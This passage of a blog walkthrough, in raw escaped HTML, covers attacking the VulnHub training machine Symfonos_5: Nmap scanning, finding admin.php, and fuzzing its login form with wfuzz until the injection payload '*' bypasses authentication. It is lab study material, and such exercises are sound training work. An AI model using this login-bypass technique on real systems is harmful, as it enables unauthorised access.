/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;&lt;span style=&quot;background-color: white;&quot;&gt;The goal of this exercise is to develop a hacking process for the vulnerable machine&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&amp;nbsp;&lt;b&gt;Symfonos_5&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;-&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: transparent;&quot;&gt;Symfonos_5&amp;nbsp;&lt;/b&gt;&lt;span&gt;can be downloaded from here:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/symfonos-52,415/&quot;&gt;https://www.vulnhub.com/entry/symfonos-52,415/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhVulZ5ZCNRbE1h0uBbTW29Nc20Ye0RZJX20GVS42BUcaJ5VCg3dIGQHcEpUK7yv0QeS6xk-0mkQFHKzbxm1sJooc6qIyo721LWYzFASCPgXKd7zGMk05UbA-DUJt7deFaVXBlyhu_M6Nug0FBCedL4nmdJnRSNKpSg0ZABkBXrt9q-OH02YozttM_N2g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;182&quot; data-original-width=&quot;293&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhVulZ5ZCNRbE1h0uBbTW29Nc20Ye0RZJX20GVS42BUcaJ5VCg3dIGQHcEpUK7yv0QeS6xk-0mkQFHKzbxm1sJooc6qIyo721LWYzFASCPgXKd7zGMk05UbA-DUJt7deFaVXBlyhu_M6Nug0FBCedL4nmdJnRSNKpSg0ZABkBXrt9q-OH02YozttM_N2g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgyhQf3zeCGdbjQ51AvWrCmu65jv5MkSqWzbvXUzlZ3gHI1ia_-O4Fxf525euyKit94BqjB5HIznCgeS2f5ny3spLpuWFhCatFZix_DZgFSteSnRPl3Ux9LABGznf-Il6U4DwxMF51EoH2EKITTD-stYHRVtP3NWv53YTbLfObd-hH2aQdJryPaNipLaQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;431&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgyhQf3zeCGdbjQ51AvWrCmu65jv5MkSqWzbvXUzlZ3gHI1ia_-O4Fxf525euyKit94BqjB5HIznCgeS2f5ny3spLpuWFhCatFZix_DZgFSteSnRPl3Ux9LABGznf-Il6U4DwxMF51EoH2EKITTD-stYHRVtP3NWv53YTbLfObd-hH2aQdJryPaNipLaQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhydQFxXgZnOzB0fv27IVyA1rNdUXRsEgc3V3qMigrtawPr9LnJSHi4PAds0OXXMQWqpKzJHVtXNygVJUTcvMVrYs6ZN1Jxh_pgwA_C8c4_4aiXtVzffXiILxJDT4MRojfH2zDzXvWeFBTZNiBkReDrP_Sdth4yVbkJjX3GDhNtWJ8xSM17nkpcsLM6jA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;421&quot; data-original-width=&quot;464&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhydQFxXgZnOzB0fv27IVyA1rNdUXRsEgc3V3qMigrtawPr9LnJSHi4PAds0OXXMQWqpKzJHVtXNygVJUTcvMVrYs6ZN1Jxh_pgwA_C8c4_4aiXtVzffXiILxJDT4MRojfH2zDzXvWeFBTZNiBkReDrP_Sdth4yVbkJjX3GDhNtWJ8xSM17nkpcsLM6jA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Dirbusting the web server we find &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;admin.php&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikJ-9ccuF3D1VOU9kNVwqerxP12DAwdu9H3bjsedoGDRMpKeMmyId0lof7z5kONLBxhIJ2t0I-9iviF_65hr3PXrbC4YDkvp-Yq_3t8i9s21xd4pXqPWTSIMF7NbQK5DbUO7vgq45OUwDHnxGDKflQHUQfvKYgSI2Uf5oIC5OYnR3lTW7jB0gR6633UQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;646&quot; data-original-width=&quot;637&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEikJ-9ccuF3D1VOU9kNVwqerxP12DAwdu9H3bjsedoGDRMpKeMmyId0lof7z5kONLBxhIJ2t0I-9iviF_65hr3PXrbC4YDkvp-Yq_3t8i9s21xd4pXqPWTSIMF7NbQK5DbUO7vgq45OUwDHnxGDKflQHUQfvKYgSI2Uf5oIC5OYnR3lTW7jB0gR6633UQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Connecting to &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;admin.php&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; there is a &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;Login&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; form:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFWU6a5yqVlP5eKCrZ874jCqOHbQqqI4GB5jX4LFe3NQ0XG1QgZFn0KJDjUs-01VveHBsrNkOKQJrIMGJI4uuhU_GElL-9Lzwfzjq3QlGqjOnSUMZZrfco-GaZHGFkywAaRWMCf7c4o7noCDvrg8QFaQqT2mvAZNSRr6LUCnK_X_ztCPVp9FKQ3Zfs-g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;413&quot; data-original-width=&quot;534&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFWU6a5yqVlP5eKCrZ874jCqOHbQqqI4GB5jX4LFe3NQ0XG1QgZFn0KJDjUs-01VveHBsrNkOKQJrIMGJI4uuhU_GElL-9Lzwfzjq3QlGqjOnSUMZZrfco-GaZHGFkywAaRWMCf7c4o7noCDvrg8QFaQqT2mvAZNSRr6LUCnK_X_ztCPVp9FKQ3Zfs-g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;3 - EXPLOITATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Wfuzz&lt;/b&gt; and wordlist&lt;b&gt; SQL.txt&lt;/b&gt; bruteforce the&lt;b&gt; Login&lt;/b&gt; application:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgjxWdqjymp9LKvpWs3fH938F0ZCqpipFHxCH1MA1jJCicYzXS6F_o5fykVfgGQSe56aEN2RW0cWWR8maGcbHElI1EYf_2OwCKPFZUZgE1QGHXYwQmTGkR2EzAluyj5zXfIWd2ZgCyVv4U8PC_WOXJl5yDBquk9ThJTtV9KDjqpLJP70K70Gl6WGGmBvA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;716&quot; data-original-width=&quot;773&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgjxWdqjymp9LKvpWs3fH938F0ZCqpipFHxCH1MA1jJCicYzXS6F_o5fykVfgGQSe56aEN2RW0cWWR8maGcbHElI1EYf_2OwCKPFZUZgE1QGHXYwQmTGkR2EzAluyj5zXfIWd2ZgCyVv4U8PC_WOXJl5yDBquk9ThJTtV9KDjqpLJP70K70Gl6WGGmBvA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There is a successful 302 response for Payload &lt;b&gt;&quot;*&quot;&lt;/b&gt;, what we should try at the &lt;b&gt;Login&lt;/b&gt; form:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiYUhcAf3jTPfCFv7EJX355J5vav9hegv6KvGrppG0iq_D2K35lPTDJNS2rt0didnLC6cP296YTS4hJGNGFwHdA9JTY3jFFXKG4pAz2Oy_DxYoAVya0hScEaP4MEWBMvNnK7GrsZ4OtzH7X6wki8xx1HRPog11bpGghLQaaVyV8QZX-RKY77TR-WM12Fg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;453&quot; data-original-width=&quot;563&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiYUhcAf3jTPfCFv7EJX355J5vav9hegv6KvGrppG0iq_D2K35lPTDJNS2rt0didnLC6cP296YTS4hJGNGFwHdA9JTY3jFFXKG4pAz2Oy_DxYoAVya0hScEaP4MEWBMvNnK7GrsZ4OtzH7X6wki8xx1HRPog11bpGghLQaaVyV8QZX-RKY77TR-WM12Fg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The &lt;b&gt;Login&lt;/b&gt; is successful and we are presented with the page&lt;b&gt; home.php:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhbK5ZTFZD4LOkDVFlFxsBM8T2zJK1Eskz647dwqEs3nZs_Il9JtGzwgnuMuQRVJVT62e3QPd1irTMitLQkHyhYgeY8k_gFv2xfOoCsWiAwwWbWptQPWMYVBfD2sYegxR4apAfjbGJWyWBTcahU1sPKLooVZv0c6XHo028RBbkxhUMGs6DoyurWd0p_Iw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;414&quot; data-original-width=&quot;463&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhbK5ZTFZD4LOkDVFlFxsBM8T2zJK1Eskz647dwqEs3nZs_Il9JtGzwgnuMuQRVJVT62e3QPd1irTMitLQkHyhYgeY8k_gFv2xfOoCsWiAwwWbWptQPWMYVBfD2sYegxR4apAfjbGJWyWBTcahU1sPKLooVZv0c6XHo028RBbkxhUMGs6DoyurWd0p_Iw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 